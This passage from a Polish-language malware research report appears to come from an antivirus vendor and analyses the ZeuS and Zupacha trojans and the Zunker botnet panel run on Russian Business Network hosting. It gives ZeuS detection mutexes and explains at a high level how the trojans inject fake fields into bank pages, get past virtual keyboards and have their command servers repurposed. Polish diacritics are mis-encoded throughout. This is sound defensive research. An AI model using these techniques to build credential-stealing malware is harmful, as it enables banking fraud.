  • Omijanie wirtualnych klawiatur. Trojan przechwytuje wci艣ni臋cia przycisk贸w myszy i wykonuje zrzuty ekranu podczas przechwytywania danych.
  • Fa艂szowanie witryn i stron. Jest to bardzo interesuj膮ca metoda, wykorzystywana wcze艣niej w Nuclear Grabber. Gdy u偶ytkownik pr贸buje skontaktowa膰 si臋 z jedn膮 ze stron monitorowanych przez trojana w celu przechwytywania danych, 偶膮danie jest przekierowywane na stron臋 phishingow膮 lub do oryginalnej strony dodawane jest nowe pole wprowadzania danych. Zawarto艣膰 strony jest modyfikowana na komputerze u偶ytkownika, zanim strona zostanie wy艣wietlona przez przegl膮dark臋.
  • Kradzie偶 certyfikat贸w.


Cech膮 rozpoznawcz膮 ZeuS, dzi臋ki kt贸rej bardzo szybko odnale藕li艣my jego warianty w naszej kolekcji, jest muteks tworzony w celu zaznaczenia swojej obecno艣ci w pami臋ci: _SYSTEM_

Na przyk艂ad:

__SYSTEM__91C38905__
__SYSTEM__64AD0625__
__SYSTEM__23D80F10__
__SYSTEM__7F4523E5__
__SYSTEM__45A2F601__

Dzi臋ki temu mogli艣my sklasyfikowa膰 wszystkie warianty ZeuS do oddzielnej rodziny o generycznej nazwie Zbot.

To w艂a艣nie jest ten "uniwersalny" kod; wykorzystuje on wiele oryginalnych metod w celu kradzie偶y wszelkiego rodzaju danych. Najniebezpieczniejsze jest to, 偶e do ka偶dego nowego warianta mo偶na doda膰 wiele innych funkcji, tak jak w przypadku Gpcode.ai.


Trzy Z

Teraz wszystko sta艂o si臋 jasne. W rezultacie, rosyjska spo艂eczno艣膰 cyberprzest臋pc贸w stosuje standardowy pakiet: zestaw Zupacha+ZeuS oraz zarz膮dzany przez ten zestaw botnet Zunker.

Rozmiar sieci zombie stworzonych przy u偶yciu tych program贸w jest imponuj膮cy. Jedna z najwi臋kszych sieci, stworzona przy u偶yciu Zunker, sk艂ada艂a si臋 w momencie wykrycia z 106000 zaatakowanych maszyn - co 24 godziny dodawanych by艂o 1 500 nowych komputer贸w. Zupacha potrafi艂 bardzo skutecznie si臋 rozprzestrzenia膰, poniewa偶 centrum dowodzenia botnetu jest 艂atwe w konfiguracji i u偶yciu.

Ka偶dy szkodliwy u偶ytkownik, nawet "dzieciak skryptowy", m贸g艂by kupi膰 te dwa trojany (ZeuS oraz Zupacha) skonfigurowane specjalnie dla konkretnego klienta. Nast臋pnie musia艂 wynaj膮膰 serwer i zainstalowa膰 Zunkera (panel steruj膮cy botnetu). Naturalnie w wielu przypadkach wybran膮 firm膮 hostingow膮 by艂a Russian Business Network, o kt贸rej przez ostatnie sze艣膰 miesi臋cy donosi艂y media, i kt贸ra zyska艂a na Zachodzie reputacj臋 podobn膮 do tej, jak膮 cieszy艂a si臋 Umbrella Corporation w grze video Resident Evil.



Interesowa艂a nas nie tyle RBN co jej klienci oraz wykorzystywane przez nich botnety. Poniewa偶 wiedzieli艣my, gdzie i czego szuka膰 艂atwo zidentyfikowali艣my kilka takich system贸w (zobacz wykres powy偶ej).

Jeste艣my pewni, 偶e niekt贸re z botnet贸w Zunker wykorzystywane by艂y do rozprzestrzeniania niebezpiecznych szkodliwych program贸w, takich jak Zhelatin (robak Storm) oraz Warezov. Ich autorzy mogli celowo wykorzysta膰 Zunker+Zupacha do stworzenia tych botnet贸w lub te偶 wydzier偶awi膰 moc istniej膮cych ju偶 botnet贸w, p艂ac膮c w艂a艣cicielom za rozprzestrzenianie swych szkodnik贸w.

Warto zauwa偶y膰, 偶e gdy Zupacha wpad艂 w r臋ce haker贸w z Zachodu, ci zachwycali si臋 koncepcj膮, analizowali kod i dyskutowali na jego temat na forach (http://www.1918.com). Chocia偶 nie mieli kodu 藕r贸d艂owego, nauczyli si臋, w jaki spos贸b mo偶na zmodyfikowa膰 adres centrum dowodzenia w pliku binarnym trojana, aby wykorzysta膰 go do swoich w艂asnych cel贸w. Pr贸bowali nawet sami stworzy膰 centrum dowodzenia zawieraj膮ce baz臋 danych, w kt贸rej zapisana zosta艂a konfiguracja trojana. P贸藕niej, jeden z tych haker贸w znalaz艂 kod centrum dowodzenia oraz struktur臋 bazy danych i wszystko potoczy艂o si臋 bardzo szybko. Osoby zaanga偶owane w to (analizowanie rosyjskiego trojana oraz wykorzystywanie "broni rosyjskiej mafii") bra艂y udzia艂 w rozwijaniu, rozprzestrzenianiu oraz popularyzacji Zupacha.


Wnioski

Powy偶sze informacje obrazuj膮, w jaki spos贸b cyberprzest臋pcy (w szczeg贸lno艣ci rosyjscy) dzia艂aj膮 zespo艂owo. Poszczeg贸lni tw贸rcy wirus贸w oraz ich grupy tworz膮 programy troja艅skie na sprzeda偶. Ci, kt贸rzy je kupuj膮, konfiguruj膮 je zgodnie z w艂asnymi potrzebami, w efekcie czego oryginalny program jest cz臋sto trudny do rozpoznania. Zainfekowane maszyny po艂膮czone s膮 w botnety, kt贸re mog膮 sk艂ada膰 si臋 z setek tysi臋cy maszyn. Maszyny te s膮 zarz膮dzane poprzez centrum dowodzenia - kodu stworzonego przez innych szkodliwych u偶ytkownik贸w, kt贸ry r贸wnie偶 jest na sprzeda偶. Botnety te mog膮 by膰 wykorzystywane do rozprzestrzeniania szeregu r贸偶nych szkodliwych program贸w, kt贸re cz臋sto bezpo艣rednio konkuruj膮 ze sob膮. Aby ca艂a ta struktura mia艂a jak najd艂u偶szy cykl 偶ycia, mimo wszystkich wysi艂k贸w firm antywirusowych oraz organ贸w 艣cigania, istniej膮 wyspecjalizowane firmy hostingowe oferuj膮ce swoje us艂ugi po cenach od kilkudziesi臋ciu do tysi臋cy dolar贸w miesi臋cznie.

Przemys艂 ten naturalnie przynosi pewne zyski, poniewa偶 istnieje nie tylko zapotrzebowanie na tworzenie i rozprzestrzenianie trojan贸w, ale r贸wnie偶 poda偶. Nasze badanie skoncentrowa艂o si臋 jedynie na cz臋艣ci g贸ry lodowej: tej z艂o偶onej z rosyjskoj臋zycznych grup haker贸w. Naturalnie istniej膮 te偶 inne grupy - z Ameryki Po艂udniowej, Chin, Turcji itd. Ka偶da z tych grup posiada w艂asny spos贸b dzia艂ania i charakter, s膮 jednak stosunkowo do siebie podobne. W Internecie nie ma 偶adnych granic.

Ostatnim przyk艂adem mo偶e by膰 artyku艂, kt贸ry pojawi艂 si臋 17 sierpnia w InformationWeek. W artykule tym Don Jackson, ekspert ds. bezpiecze艅stwa w SecureWorks, powiedzia艂, 偶e zidentyfikowa艂 12 schowk贸w danych, z kt贸rych wi臋kszo艣膰 zawiera艂a od czterech do sze艣ciu tysi臋cy skradzionych wpis贸w. W sumie, skradzione zosta艂y dane oko艂o 100 000 os贸b. Dane te zosta艂y skradzione przez trojany zawarte w fa艂szywych reklamach na dw贸ch najwi臋kszych stronach rekrutacyjnych, z kt贸rych jedna to Monster.com.

Prawdopodobnie odgadli艣cie ju偶, o jakim trojanie m贸wi艂 Jackson, i gdzie szkodnik ten wys艂a艂 przechwycone dane. Tak, macie racj臋! To ZeuS, "uniwersalny" kod, kt贸ry wys艂a艂 dane do Russian Business Network.